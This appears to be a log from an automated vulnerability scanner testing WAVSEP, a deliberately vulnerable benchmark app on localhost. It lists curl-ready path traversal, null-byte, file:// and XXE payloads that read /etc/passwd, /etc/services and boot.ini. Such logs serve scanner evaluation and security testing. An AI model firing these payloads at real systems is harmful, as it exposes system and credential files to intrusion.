GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
